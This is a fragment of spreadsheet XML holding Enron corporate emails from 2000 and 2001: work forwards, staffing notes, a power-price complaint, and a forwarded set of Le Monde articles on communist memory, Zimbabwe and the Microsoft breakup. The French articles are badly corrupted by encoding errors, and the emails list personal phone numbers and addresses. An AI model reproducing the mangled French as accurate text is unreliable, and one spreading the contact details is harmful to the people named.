on Californians, we should include ALL power producers in our_x000D_
investigations.  State and federal agencies, independent power_x000D_
companies,_x000D_
utilities, municipal utilities, and even local irrigation districts_x000D_
could_x000D_
all be guilty of gouging consumers.  Davis's focusing on only those_x000D_
companies from Texas does everyone in this state a disservice and is a_x000D_
misrepresentation of fact._x000D_
_x000D_
------------------------------_x000D_
_x000D_
Curt Pringle_x000D_
Curt Pringle &amp; Assoc._x000D_
2532 Dupont Drive_x000D_
Irvine, CA 92612_x000D_
_x000D_
(949) 474-4090_x000D_
(949) 474-4082 fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 11:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Site Structure Diagram</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Taylor/HOU/ECT on 04/18/2000 07:27 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Mark E Haedicke                           04/18/2000 01:10 PM_x000D_
	_x000D_
_x000D_
To: Michael R Brown/LON/ECT@ECT, Mark Taylor/HOU/ECT@ECT, kraisler@sc.com_x000D_
cc:  _x000D_
Subject: Site Structure Diagram_x000D_
_x000D_
For your review -- the latest diagram for the paper website.  Michael, I am _x000D_
free to discuss this at your convenience.  I am hopeful this structure will _x000D_
be unregulated in Europe as well.  Mark_x000D_
---------------------- Forwarded by Mark E Haedicke/HOU/ECT on 04/18/2000 _x000D_
01:03 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Brandon Wax                           04/18/2000 11:48 AM_x000D_
	_x000D_
_x000D_
To: Mark E Haedicke/HOU/ECT@ECT_x000D_
cc: Greg Piper/Corp/Enron@Enron _x000D_
Subject: Site Structure Diagram_x000D_
_x000D_
Mark, _x000D_
_x000D_
Attached is the site structure diagram we were looking at earlier.  Let me _x000D_
know if you have any questions or would like to discuss the credit interface _x000D_
more thoroughly.  I will also forward the clean presentation copy with I get _x000D_
it back from graphics._x000D_
_x000D_
_x000D_
       -Brandon_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 10:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Names of Central desk group</t>
  </si>
  <si>
    <t>Remove Scott Palmer from the list attached effective 2/15/01 and add Anna _x000D_
Kulic starting tomorrow.  _x000D_
PL</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 12:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PBA, Variable Pay</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know if we want to change accounting methodology.  Your call._x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Tracy Geaccone/GPGFIN/Enron on 01/29/2001 09:00 AM ---------------------------_x000D_
   _x000D_
	  From:  Julia Pittman                           01/26/2001 03:22 PM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Tracy Geaccone/GPGFIN/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	PBA, Variable Pay_x000D_
_x000D_
Tracy,_x000D_
_x000D_
Last year I had to accrue variable pay etc.  Will I still need to do that this year?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Julia_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 May 2000 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Le Monde</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/01/2000=_x000D_
=20_x000D_
12:08 PM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 04/30/2000 11:08:30 AM_x000D_
To: vkamins@enron.com_x000D_
cc: =20_x000D_
Subject: Le Monde_x000D_
_x000D_
_x000D_
La m,moire ambigu% du communisme_x000D_
_x000D_
_x000D_
  Mis . jour le samedi 29 avril 2000_x000D_
_x000D_
_x000D_
L'_VOCATION de la terreur exerc,e par les r,gimes communistes, qu'on pouvai=_x000D_
t_x000D_
supposer - et esp,rer - voir passer de la triste r,alit, au d,bat historien=_x000D_
,_x000D_
tend . se transformer chez certains de ses d,nonciateurs les plus virulents_x000D_
en une v,ritable croisade pour la m,moire. Une croisade qui croit trouver s=_x000D_
ur_x000D_
sa route l'obstacle d'une autre m,moire ,mergente : celle de la Shoah, avec_x000D_
laquelle elle s'obstine . entrer dans une p,nible r concurrence _._x000D_
_x000D_
Nul doute que le chapitre introductif du Livre noir du communisme, paru en_x000D_
France . l'automne 1997 et publi,, depuis, dans seize pays - texte dans_x000D_
lequel l'historien St,phane Courtois plaide pour un r Nuremberg du communis=_x000D_
me_x000D_
_ -, a contribu, . lib,rer ce genre d'offensive. Contre qui ? Contre l' r_x000D_
int,grisme de la m,moire _ et le r monopole du crime contre l'humanit, _ qu=_x000D_
e_x000D_
s'arrogeraient des r individus _ dans la r communaut, juive _, ce qui_x000D_
expliquerait le d,s,quilibre entre la m,moire du nazisme et celle du_x000D_
communisme. Tels sont les termes utilis,s par St,phane Courtois dans un_x000D_
entretien accord, . Politique internationale et que critique Marc Lazar,_x000D_
professeur . l'Institut d',tudes politiques de Paris, dans la derniSre_x000D_
livraison de la revue Communisme (L'Age d'homme, no 59-60)._x000D_
_x000D_
Ce combat, qui se couvre de l'autorit, scientifique et s'autorise de_x000D_
l'empathie que provoque le bilan meurtrier des pays communistes, est de_x000D_
nature plut"t id,ologique. Plus qu'en France, un v,ritable r effet-Livre no=_x000D_
ir_x000D_
_ se fait sentir dans les pays naguSre soumis . la sphSre d'influence_x000D_
sovi,tique, o- de tels discours conduisent . de multiples d,rives ; entre_x000D_
autres au retour inqui,tant d'un mythe refoul,, celui du r jud,o-bolchevism=_x000D_
e_x000D_
_. Dans cette logique, les victimes de la Shoah se seraient, aprSs 1945,_x000D_
m,tamorphos,es en bourreaux staliniens. D'o- l'id,e que ces derniers auraie=_x000D_
nt_x000D_
aujourd'hui r int,rt _ . imposer le silence sur leurs r m,faits _.??Franchi=_x000D_
ssant un pas de plus et mettant en ,vidence la proportion d'agents?d'origin=_x000D_
e juive dans l'administration sovi,tique, et notamment dans le NKVD,?certai=_x000D_
ns flirtent avec une application ,tendue de la th,orie du r noyau?rationnel=_x000D_
 _ chSre . l'historien allemand Ernst Nolte.?????Sans nier la Shoah, cette =_x000D_
th,orie consiste . avancer l'hypothSse que le?g,nocide juif aurait constitu=_x000D_
, une r violence r,active _ face . un?bolchevisme lui-mme quelque peu r enj=_x000D_
uiv, _. Que la proportion de juifs_x000D_
europ,ens engag,s activement dans le communisme ait ,t, infime, voire_x000D_
marginale, puisque, politiquement, la majorit, des juifs se sont r,partis a=_x000D_
u_x000D_
cours du XXe siScle entre sionisme, social-d,mocratie, orthodoxie ou_x000D_
assimilation, que le juda&lt;sme sovi,tique et est-europ,en ait lui-mme?consid=_x000D_
,rablement souffert de la terreur stalinienne, ne font rien . l'affaire?: i=_x000D_
nsidieusement . l'Est, la vieille th,matique du r jud,o-bolchevisme _?paraO=_x000D_
t faire son chemin, y compris jusque dans les cerveaux les plus savants.??D=_x000D_
ans des pays fragilis,s par l'exp,rience du communisme r,el, par exemple en=_x000D_
?Roumanie, cette configuration doit tre replac,e dans le cadre d'une_x000D_
entreprise de refondation identitaire qui ,prouve le besoin de se nourrir_x000D_
d'une confrontation permanente avec la m,moire juive. Des r lobbies __x000D_
suppos,s y sont couramment accus,s de tenter - ,ventuellement sur la base_x000D_
d'une conspiration - de jeter un voile d'oubli ou d'ignorance sur des crime=_x000D_
s_x000D_
dont les juifs sont parfois d,sign,s comme les auteurs. Pour des soci,t,s_x000D_
hant,es par la reconqute d'une fiert, nationale mise . mal par des d,cennie=_x000D_
s?de dictature et d'humiliation, pareil ,chafaudage th,orique, pour branlan=_x000D_
t?qu'il soit, a l'avantage de repr,senter une merveilleuse fabrique d'innoc=_x000D_
ence.??Pourtant, le totalitarisme communiste a, . c"t, de la pr,sence des t=_x000D_
roupes du?pacte de Varsovie et comme toutes les dictatures contemporaines,?=_x000D_
n,cessairement repos, aussi sur un tissu de compromission quotidienne avec =_x000D_
le?pouvoir. Affronter cette douloureuse r,alit,, plus de dix ans aprSs la c=_x000D_
hute?du mur, demeure difficile. Le dissident tchSque Vaclav Havel fut peut-=_x000D_
tre_x000D_
l'un des premiers . mettre en garde ses concitoyens contre les tentations_x000D_
victimaires et l'ext,riorisation syst,matique de la cause du mal. Ne leur_x000D_
disait-il pas, dSs janvier 1990 : r Nous qui nous sommes tous habitu,s au_x000D_
systSme (...), nous sommes tous en mme temps, chacun dans une mesure?diff,r=_x000D_
ente, ses cofondateurs. (...) Il ne serait pas raisonnable de?consid,rer le=_x000D_
 triste h,ritage des derniSres quarante ann,es comme quelque?chose d',trang=_x000D_
er qui nous a ,t, l,gu, par un parent lointain. _??Les d,rives qui s'autori=_x000D_
sent d'une certaine lecture du Livre noir indisposent?une partie de ses aut=_x000D_
eurs dont quelques-uns avaient, dSs la parution de?l'ouvrage, tenu . prendr=_x000D_
e leur distance avec le texte introductif.??  TENDANCE ? LA VICTIMISATION??=_x000D_
C'est aujourd'hui un proche de St,phane Courtois, Marc Lazar, qui lui?repro=_x000D_
che de juger, sans v,ritablement argumenter, que r ce qui s'est pass, .?Aus=_x000D_
chwitz se retrouve grosso modo en URSS et dans d'autres pays communistes?_.=_x000D_
 Marc Lazar replace la d,marche de St,phane Courtois dans le cadre d'une?in=_x000D_
terpr,tation de la m,moire en termes de manipulation, qui pr,tend la?r,duir=_x000D_
e . une r conception strat,gique _, ourdie par des r acteurs collectifs?par=_x000D_
faitement organis,s et poursuivant des objectifs clairs et coh,rents _.?Cet=_x000D_
te tendance semble s,duire un nombre croissant d'historiens, bien qu'elle?s=_x000D_
oit fond,e sur une vision assez fruste des ph,nomSnes de m,moire, processus=_x000D_
?sociaux aux contours toujours complexes dont la dynamique demeure?difficil=_x000D_
ement maOtrisable.??Quoi qu'il en soit, Communisme semble ici tomber dans l=_x000D_
es piSges de?l'histoire-m,moire en publiant un texte d'hommage au grand his=_x000D_
torien roumain?Georghe Bratianu. Si Georghe Bratianu fut bien victime de la=_x000D_
 version roumaine?du stalinisme en 1953, on ne saurait minimiser non plus, =_x000D_
comme le fait?l'auteur, l'universitaire britannique John Rogister, qu'il fu=_x000D_
t aussi l'un des?artisans du rapprochement de son pays avec l'Allemagne naz=_x000D_
ie et un?nationaliste belliqueux. Tous les morts du communisme ont certes d=_x000D_
roit au?respect. Mais ce statut de victime ne rend pas forc,ment l'ensemble=_x000D_
 de leur?action digne d'un ,loge inconditionnel.??Jean-Louis Margolin, qui =_x000D_
a sign, dans Le Livre noir les contributions sur le?communisme asiatique, r=_x000D_
,sume ironiquement ce qui provoque la r,ticence d'une?partie des auteurs : =_x000D_
r Dans les pays d'Europe orientale, ,crit-il, le?communisme, contraire aux =_x000D_
nobles et saines traditions nationales, serait?toujours surimpos, de l'ext,=_x000D_
rieur. Pour ceux qui furent soumis . la puissance?russe, le coupable est ai=_x000D_
s, . trouver. Pour les Russes, la cause est moins?entendue, mais qu'. cela =_x000D_
ne tienne : suivant le go-t du jour on accusera les?Allemands, les juifs ou=_x000D_
... Lucifer. _ En Europe de l'Est, cette tendance . la?victimisation est po=_x000D_
litiquement dangereuse. L'exemple serbe montre . quel?point elle peut about=_x000D_
ir . la l,gitimation de la violence nationaliste. Raison?de plus pour ne pa=_x000D_
s l'encourager depuis Paris.??  Nicolas Weill????Le Monde dat, du dimanche =_x000D_
30 avril 2000?????Zimbabwe : la fuite en avant de Robert Mugabe, par Fr,d,r=_x000D_
ic Fritscher???  Mis . jour le jeudi 27 avril 2000???H,ros incontest, de la=_x000D_
 guerre d'ind,pendance du Zimbabwe, chantre reconnu de?la lutte antiaparthe=_x000D_
id et, avec l'ancien pr,sident zambien Kenneth Kaunda,?animateur virulent d=_x000D_
e l'organisation des pays de la ligne de front contre le?r,gime de Pretoria=_x000D_
, Robert Mugabe n'est plus aujourd'hui qu'un personnage?anachronique. Desmo=_x000D_
nd Tutu, l'ancien archevque anglican du Cap, Prix Nobel_x000D_
de la paix en 1984, le d,crit comme r la caricature de ce que le monde pens=_x000D_
e_x000D_
que les dirigeants africains noirs sont _._x000D_
_x000D_
Les propos du pr,lat reflStent la d,ception des dirigeants sud-africains. I=_x000D_
ls_x000D_
r,sument aussi l'opinion publique du Zimbabwe, o- le pr,sident Mugabe vient_x000D_
d'essuyer deux camouflets successifs. La population consult,e par r,f,rendu=_x000D_
m,_x000D_
le 12 et le 13 f,vrier, sur de substantielles modifications de la_x000D_
Constitution, qui avaient pour objectif essentiel de consolider les pouvoir=_x000D_
s_x000D_
pr,sidentiels, a r,pondu r non _ - . 54,6 % - aux questions qui lui ,taient_x000D_
pos,es. Supportant difficilement la d,rive autocratique du r,gime, les_x000D_
Zimbabw,ens ont, en fait, dit r non _ . Robert Mugabe, plut"t qu'. une_x000D_
nouvelle Constitution dont le texte avait ,t, assez peu comment, publiqueme=_x000D_
nt._x000D_
_x000D_
La publication, un mois plus tard, le 10 mars, des r,sultats d'un sondage_x000D_
r,alis, par Probe Market Research, un institut reconnu, li, . Gallup_x000D_
International, pour le compte de la fondation sud-africaine Helen Suzman po=_x000D_
ur_x000D_
la promotion de la d,mocratie, confirme le ras-le-bol des Zimbabw,ens, dont_x000D_
65 % souhaitent le retrait de la vie publique du pr,sident, qui vient de_x000D_
fter ses soixante-seize ans. Ils espSrent aussi, . 63 %, un changement de?g=_x000D_
ouvernement et cela jusque dans les zones rurales, o- l'Union nationale?afr=_x000D_
icaine du Zimbabwe-Front patriotique (Zanu-PF), le parti au pouvoir, est?so=_x000D_
lidement implant,e.??DISCOURS POPULISTE??Le sondage indique clairement que =_x000D_
les Zimbabw,ens sont avant tout pr,occup,s?par le ch"mage, la flamb,e des p=_x000D_
rix, les vicissitudes de leur quotidien, et?qu'ils restent insensibles, . 8=_x000D_
0 %, aux arguments du chef de l'Etat accusant?les Blancs rest,s au pays apr=_x000D_
Ss l'ind,pendance d'tre responsables des_x000D_
difficult,s ,conomiques actuelles._x000D_
_x000D_
Seule une petite minorit, des sond,s (9 %) estime que la r,forme agraire,_x000D_
pr,sent,e comme primordiale par le gouvernement, est un dossier essentiel._x000D_
L'opinion publique ne bl?me pas les fermiers blancs pour le blocage de la_x000D_
r,forme, mais le gouvernement lui-mme (74 %). Etrange paradoxe, puisque,?da=_x000D_
ns le mme temps, le mouvement d'occupation des propri,t,s appartenant ._x000D_
des fermiers blancs par les anciens combattants de la guerre d'ind,pendance=_x000D_
,_x000D_
les r v,t,rans _, lanc, le 28 f,vrier . l'instigation du pr,sident Mugabe,_x000D_
continue de s',tendre._x000D_
_x000D_
Les r v,t,rans _, soutenus par la Zanu, affirment qu'ils ne font que_x000D_
reprendre les terres vol,es . leurs anctres par les Blancs au siScle?dernie=_x000D_
r, dans cette ancienne colonie britannique. L'opposition politique?accuse l=_x000D_
e pr,sident Mugabe d'avoir organis, l'occupation des terres pour r?punir _ =_x000D_
les Blancs, qu'il rend responsables du rejet de la nouvelle?Constitution lo=_x000D_
rs du dernier r,f,rendum.??Plusieurs personnes ont trouv, la mort au cours =_x000D_
des derniSres semaines. Avec?la complicit, passive de la police zimbabw,enn=_x000D_
e, les r v,t,rans _ ont?assassin, deux fermiers blancs ainsi que deux milit=_x000D_
ants noirs du Mouvement?pour le changement (MDC), principale formation de l=_x000D_
'opposition, br-l,s vifs?dans l'incendie de leur voiture, et un policier en=_x000D_
 civil. Ils ont ,galement?viol, deux femmes blanches, parentes d'un respons=_x000D_
able influent du Syndicat?des fermiers commerciaux (CFU).??Robert Mugabe co=_x000D_
ntinue n,anmoins de soutenir fermement les anciens?combattants. La Haute Co=_x000D_
ur de justice a, par deux fois, d,clar, les?occupations des fermes ill,gale=_x000D_
s et ordonn, leur ,vacuation. Par deux fois,?le pr,sident a refus, de faire=_x000D_
 appliquer les d,cisions de justice,?interdisant mme aux forces de police d=_x000D_
'intervenir. Dans sa fuite en avant,_x000D_
M. Mugabe a choisi encore une fois de prendre la minorit, blanche comme bou=_x000D_
c_x000D_
,missaire. Le proc,d, n'est pas nouveau. Il constitue depuis vingt ans un d=_x000D_
es_x000D_
thSmes r,currents de son discours populiste. Il a trait, les fermiers blanc=_x000D_
s_x000D_
d' r ennemis du Zimbabwe _ le jour mme o- l'un d'entre eux ,tait l?chement?=_x000D_
assassin,. L'an dernier, . l'occasion de son soixante-quinziSme anniversair=_x000D_
e,?il avait estim, que les Blancs zimbabw,ens devaient r demander pardon po=_x000D_
ur?leurs p,ch,s pass,s _. r Il ne faut pas leur laisser le sentiment, parce=_x000D_
?qu'ils contr"lent l',conomie, qu'ils sont nos maOtres. Le combat est clair=_x000D_
,?c'est Noirs contre Blancs _, avait-il ajout,.??Le problSme foncier est cr=_x000D_
ucial au Zimbabwe, o- Robert Mugabe promet aux r?v,t,rans _ une redistribut=_x000D_
ion ,quitable des terres depuis l'accession?officielle du pays . l'ind,pend=_x000D_
ance, le 18 avril 1980. Les accords de?Lancaster House, sign,s . Londres le=_x000D_
 21 d,cembre 1979, portaient sur les?conditions d'un cessez-le-feu et sur l=_x000D_
es modalit,s d'accession au pouvoir de?la majorit, noire. Ils ont mis un te=_x000D_
rme . sept ans d'une guerre sanglante?entre le r,gime blanc de Ian Smith - =_x000D_
qui avait d,clar, unilat,ralement?l'ind,pendance de la Rhod,sie en 1965, po=_x000D_
ur pr,venir l'avSnement d'un pouvoir?noir - et les nationalistes conduits p=_x000D_
ar Robert Mugabe et Joshua Nkomo,?codirigeants du Front patriotique. Mais c=_x000D_
es accords pr,voyaient ,galement une?aide internationale . la r,forme agrai=_x000D_
re pouvant atteindre 2 milliards de?dollars. De l'aveu mme de Robin Cook, l=_x000D_
e ministre britannique des affaires_x000D_
,trangSres, la Grande-Bretagne - ancienne puissance coloniale - n'y a_x000D_
contribu, qu'. hauteur de 70 millions de dollars._x000D_
_x000D_
M. Mugabe avait fait adopter, le 19 mars 1992, par le Parlement, une loi_x000D_
permettant d'exproprier les riches fermiers blancs pour installer sur leurs_x000D_
vastes propri,t,s un grand nombre de petits paysans noirs. Poursuivant son_x000D_
dessein, il avait fait publier, le 28 novembre 1997, la liste officielle de=_x000D_
s_x000D_
1 500 propri,t,s que le gouvernement souhaitait r nationaliser _ pour les_x000D_
redistribuer. L'expropriation portait sur quelque 5 millions d'hectares, la_x000D_
moiti, des terres exploit,es par des fermiers blancs, et ne devait donner_x000D_
lieu . aucune indemnisation._x000D_
_x000D_
Cependant, au cours des vingt derniSres ann,es, les quelques propri,t,s_x000D_
rachet,es ou r,quisitionn,es par les autorit,s ont ,t, redistribu,es non pa=_x000D_
s_x000D_
. de petits paysans noirs comme elles auraient d- l'tre, mais . des membres=_x000D_
?de la nomenklatura, dirigeants de la Zanu ou proches de la famille Mugabe.=_x000D_
??N_POTISME ET CORRUPTION??Le n,potisme et la corruption sont deux des prin=_x000D_
cipaux reproches adress,s par?l'opposition et la population au r,gime de M.=_x000D_
 Mugabe, qui subit, depuis?d,cembre 1997, une pression populaire croissante=_x000D_
. Le r,gime fait le choix de?l'autoritarisme et la d,rive personnelle du po=_x000D_
uvoir devient ,vidente lorsque,?en ao-t 1998, Robert Mugabe d,cide, sans co=_x000D_
nsulter ni le Parlement ni le?gouvernement, d'envoyer un corps exp,ditionna=_x000D_
ire en R,publique d,mocratique?du Congo (RDC, ex-Za&lt;re) pour voler au secou=_x000D_
rs de Laurent-D,sir, Kabila,?menac, par une r,bellion interne et ses voisin=_x000D_
s ougandais et rwandais. Les?Zimbabw,ens s'interrogent sur la n,cessit, d'e=_x000D_
ngager ces 11 000 soldats dans?un conflit lointain, qui co-te quelque 30 mi=_x000D_
llions de dollars chaque mois .?un pays en plein marasme ,conomique.??C'est=_x000D_
 dans ce contexte peu favorable, somme toute, que le pr,sident Mugabe?enten=_x000D_
d conduire la Zanu aux ,lections l,gislatives pr,vues en mai. Et pour la?pr=_x000D_
emiSre fois depuis l'ind,pendance, la Zanu - qu'il voulait transformer en?p=_x000D_
arti unique en 1990, alors que le multipartisme bourgeonnait partout sur le=_x000D_
?continent - risque fort d'tre bouscul,e par l'union possible de l'oppositi=_x000D_
on=20_x000D_
autour du MDC, fond, par l'ancien dirigeant syndicaliste Morgan Tsvangirai._x000D_
_x000D_
Fr,d,ric Fritscher_x000D_
_x000D_
_x000D_
_x000D_
Le Monde dat, du vendredi 28 avril 2000_x000D_
_x000D_
Comment d,couper Microsoft ?, par Fran?ois L,vque???  Mis . jour le vendred=_x000D_
i 28 avril 2000???Le d,mantSlement de Microsoft est envisag, pour mettre fi=_x000D_
n aux pratiques?anticoncurrentielles de l'entreprise de Redmond. Dans quel =_x000D_
sens d,couper la?soci,t, et en combien de morceaux ? Il y a plusieurs solut=_x000D_
ions possibles mais?il est difficile d'en choisir une.??Une premiSre option=_x000D_
 consiste . d,couper Microsoft selon un trait horizontal?qui s,parerait les=_x000D_
 activit,s d,di,es aux logiciels d'application de celles du?systSme d'explo=_x000D_
itation. Ce d,membrement en deux morceaux r,sout la question?des produits l=_x000D_
i,s, comme le rattachement abusif d'Internet Explorer .?Windows, mais n'ent=_x000D_
ame pas le monopole de Microsoft sur le march, des?systSmes d'exploitation =_x000D_
pour ordinateur personnel.??DeuxiSme solution : proc,der . un d,coupage ver=_x000D_
tical qui diviserait?l'entreprise de Bill Gates en mini-Microsofts identiqu=_x000D_
es. Le nombre de ces?Baby Bills (nomm,es ainsi par la presse am,ricaine par=_x000D_
 analogie avec les Baby?Bells cr,,es lors du d,mantSlement d'ATT) doit tre =_x000D_
au moins de trois pour_x000D_
instaurer la concurrence._x000D_
_x000D_
Un troisiSme d,membrement envisageable est de combiner divisions horizontal=_x000D_
e_x000D_
et verticale. Il donnerait naissance . quatre entreprises : trois Baby_x000D_
Windows, et une Baby Applications, qui conserveraient la libert, d',tendre_x000D_
leurs activit,s vers l'amont ou vers l'aval._x000D_
_x000D_
Chacune de ces solutions entraOne des cons,quences diff,rentes pour le_x000D_
consommateur et r,clame des mesures d'accompagnement plus ou moins co-teuse=_x000D_
s_x000D_
pour l'administration. Le d,membrement en deux morceaux aboutit . la perte_x000D_
des ,conomies li,es . l'int,gration verticale (c'est l'id,e que la_x000D_
connaissance complSte du systSme d'exploitation permet de d,velopper ._x000D_
moindre co-t des logiciels d'application). Ces ,conomies sont toutefois ass=_x000D_
ez_x000D_
faibles selon les experts._x000D_
_x000D_
Le co-t du d,mantSlement horizontal serait donc modeste pour les_x000D_
consommateurs. Ce qui n'est pas le cas du d,membrement vertical. Les Baby_x000D_
Bills vont mener des strat,gies de diff,renciation qui vont conduire . une_x000D_
fragmentation des standards. Les nouvelles versions de Windows ne seront pl=_x000D_
us_x000D_
compatibles._x000D_
_x000D_
La troisiSme solution cumule les deux inconv,nients. Sur le plan des_x000D_
b,n,fices, le classement s'inverse. En effet, le b,n,fice attendu des mesur=_x000D_
es_x000D_
de d,mantSlement est celui qu'apporte la concurrence (baisse des prix et_x000D_
acc,l,ration de l'innovation). Or la concurrence est d'autant plus forte qu=_x000D_
e_x000D_
le nombre d'entreprises est grand et qu'aucun monopole ne subsiste sur les_x000D_
march,s._x000D_
_x000D_
Le d,mantSlement vertical et horizontal en quatre morceaux laisse esp,rer u=_x000D_
n_x000D_
plus grand b,n,fice que le d,mantSlement vertical en trois morceaux, qui_x000D_
lui-mme est plus avantageux pour le consommateur que le d,mantSlement?horiz=_x000D_
ontal en deux morceaux. Du c"t, des co-ts administratifs, le?d,membrement h=_x000D_
orizontal et vertical est ,galement la solution la plus?avantageuse. La seu=_x000D_
le t?che des pouvoirs publics est d'empcher les alliances_x000D_
et les fusions. Les d,penses de contr"le sont trSs ,lev,es en revanche dans_x000D_
le cas du d,mantSlement horizontal. Des mesures de r,glementation, comme la_x000D_
tarification administr,e, doivent n,cessairement compl,ter le dispositif_x000D_
puisque le monopole de Windows est maintenu intact. Le cas du d,mantSlement_x000D_
vertical occupe une position interm,diaire. Il appelle simplement des mesur=_x000D_
es_x000D_
r,glementaires transitoires, comme l'interdiction faite au personnel r,part=_x000D_
i_x000D_
au d,part dans les trois soci,t,s de changer imm,diatement de Baby Bill (de_x000D_
rejoindre par exemple celle qui resterait dirig,e par Bill Gates)._x000D_
_x000D_
L'objectif poursuivi par les autorit,s de la concurrence est de servir_x000D_
l'int,rt du consommateur. La solution qui devrait tre choisie par la_x000D_
division antitrust am,ricaine est donc celle qui maximise l',cart entre le_x000D_
b,n,fice apport, par une plus grande concurrence et le co-t induit par la_x000D_
perte en ,conomies d'int,gration verticale et de compatibilit,. La_x000D_
comparaison entre le d,mantSlement horizontal et le d,mantSlement combin, e=_x000D_
st_x000D_
ici difficile. Dans le premier cas, il faut soustraire un faible co-t d'un_x000D_
faible b,n,fice tandis que dans le second, il faut retirer un co-t ,lev, d'=_x000D_
un_x000D_
b,n,fice ,lev,._x000D_
_x000D_
On peut en revanche ,liminer facilement la solution du d,mantSlement_x000D_
vertical. En effet, en compl,tant le d,coupage vertical par un d,coupage_x000D_
horizontal, l'intensit, de la concurrence augmente fortement et donc le_x000D_
b,n,fice pour le consommateur tandis que ce dernier subit un faible surco-t=_x000D_
._x000D_
Restent donc deux solutions possibles que seules des ,valuations chiffr,es_x000D_
permettraient de d,partager. Les autorit,s de la concurrence am,ricaines_x000D_
s'apprtent . demander un d,mantSlement horizontal, ce qui reflSte sans dout=_x000D_
e?que la solution combin,e est moins favorable au consommateur.??Si l'objec=_x000D_
tif poursuivi est l'int,rt g,n,ral - un objectif que l'on peut_x000D_
prter aux juges - le choix de d,mantSlement doit aussi tenir compte des?co-=_x000D_
ts des mesures de contr"le pour l'administration. La solution . retenir?n'e=_x000D_
st alors plus forc,ment la mme puisqu'il s'agit maintenant de maximiser_x000D_
le gain pour le consommateur net du co-t administratif. Si les ,conomies po=_x000D_
ur_x000D_
l'administration que permet de r,aliser le d,mantSlement horizontal et_x000D_
vertical l'emportent sur la r,duction du gain pour le consommateur (due en_x000D_
particulier . la fragmentation des standards), la cr,ation de trois Baby_x000D_
Windows et d'un Baby Applications est une meilleure solution. Rien ne dit_x000D_
donc que le juge Thomas Penfield Jackson retiendra l'option de d,mantSlemen=_x000D_
t_x000D_
en deux morceaux propos,e aujourd'hui par les plaignants._x000D_
_x000D_
Fran?ois L,vque  est professeur d',conomie . l'Ecole nationale sup,rieure?d=_x000D_
es mines de Paris. par Fran?ois L,vque_x000D_
_x000D_
_x000D_
_x000D_
Le Monde dat, du samedi 29 avril 2000_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 02:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Misc Stuff</t>
  </si>
  <si>
    <t>Suzanne:_x000D_
If Bill gets his act together I will hand you an invitation to our party _x000D_
tomorrow, but here are the details:  Saturday, April 22, 5-7.  If you have _x000D_
some time, please stop by this afternoon and hopefully I can narrow down what _x000D_
I want to order.  Alos, have you had any kluck in getting some Enron stuff _x000D_
for my JA class?_x000D_
_x000D_
Carol</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 13:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: New Contact for Devon</t>
  </si>
  <si>
    <t xml:space="preserve">What do you mean "leaving Enron"?  Where are you going?  _x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Beverly Beaty_x000D_
03/13/2001 09:11 AM_x000D_
To:	Charlene.Merrill@dvn.com, Victor.Haley@dvn.com, Alan.Coad@dvn.com, Deana.Thayer@dvn.com_x000D_
cc:	Mark L Schrab/HOU/ECT@ECT, Kirk Lenart/HOU/ECT@ECT, Jesse Villarreal/HOU/ECT@ECT, Sabra L Dinari/HOU/ECT@ECT, Clarissa Garcia/HOU/ECT@ECT, Daren J Farmer/HOU/ECT@ECT, Meredith Homco/HOU/ECT@ECT, Cynthia Franklin/Corp/Enron@ENRON, Christina Sanchez/Corp/Enron@ENRON, Darren Espey/Corp/Enron@ENRON, Carlos J Rodriguez/HOU/ECT@ECT, Scott Loving/NA/Enron@ENRON, George F Smith/HOU/ECT@ECT, Margie Straight/HOU/ECT@ECT, Mary Ellenberger/Corp/Enron@ENRON, Aimee Lannou/HOU/ECT@ECT, Jessica White/NA/Enron@Enron, Patti Sullivan/HOU/ECT@ECT, Teresa McOmber/NA/Enron@ENRON, hpl.scheduling@enron.com, Katherine L Kelly/HOU/ECT@ECT _x000D_
Subject:	New Contact for Devon_x000D_
_x000D_
Please note that I will be leaving Enron as of March 23,2001.  Please send future e-mails regarding _x000D_
Devon changes to Kathy Kelly and Clarissa Garcia, as well as the schedulers that you are already sending_x000D_
changes too.  They will coordinate all future Devon inquiries and changes._x000D_
_x000D_
If there are questions before then, please call me at 713-853-6357_x000D_
_x000D_
Thanks,_x000D_
Beverly Beaty_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 08:42:55 -0800 (PST)</t>
  </si>
  <si>
    <t>I'm trying.  I'm in traffic.  You can call me if you want or elae I am going to crash.  832-274-6528._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 08:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'epr@pipeline.com'})</t>
  </si>
  <si>
    <t>Re: Seeking opportunity in computational finance</t>
  </si>
  <si>
    <t xml:space="preserve">Paul,_x000D_
_x000D_
Can you give me more information about  your computer skills?_x000D_
_x000D_
My group is very hands-on oriented and  computer programming is a critical_x000D_
skill._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
